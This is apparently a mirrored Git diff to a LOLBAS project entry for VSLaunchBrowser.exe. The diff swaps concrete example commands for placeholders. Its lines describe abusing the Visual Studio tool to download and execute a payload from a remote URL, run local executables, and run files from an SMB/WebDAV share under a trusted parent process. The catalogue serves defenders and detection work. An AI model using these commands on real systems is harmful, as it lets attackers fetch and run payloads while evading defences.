mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 04:32:24 +02:00
@@ -4,7 +4,7 @@ Description: Microsoft Visual Studio browser launcher tool for web applications
|
||||
Author: Avihay Eldad
|
||||
Created: 2024-04-12
|
||||
Commands:
|
||||
- Command: VSLaunchBrowser.exe .exe http://example.com/payload
|
||||
- Command: VSLaunchBrowser.exe .exe {REMOTEURL:.exe}
|
||||
Description: Download and execute payload from remote server
|
||||
Usecase: It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
|
||||
Category: Download
|
||||
@@ -13,7 +13,7 @@ Commands:
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
- Command: VSLaunchBrowser.exe .exe C:\Windows\System32\calc.exe
|
||||
- Command: VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe}
|
||||
Description: Execute payload via VSLaunchBrowser as parent process
|
||||
Usecase: It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
|
||||
Category: Execute
|
||||
@@ -22,7 +22,7 @@ Commands:
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: VSLaunchBrowser.exe .exe \\Server\Path\file
|
||||
- Command: VSLaunchBrowser.exe .exe {PATH_SMB}
|
||||
Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process
|
||||
Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
|
||||
Category: Execute
|
||||
|
Reference in New Issue
Block a user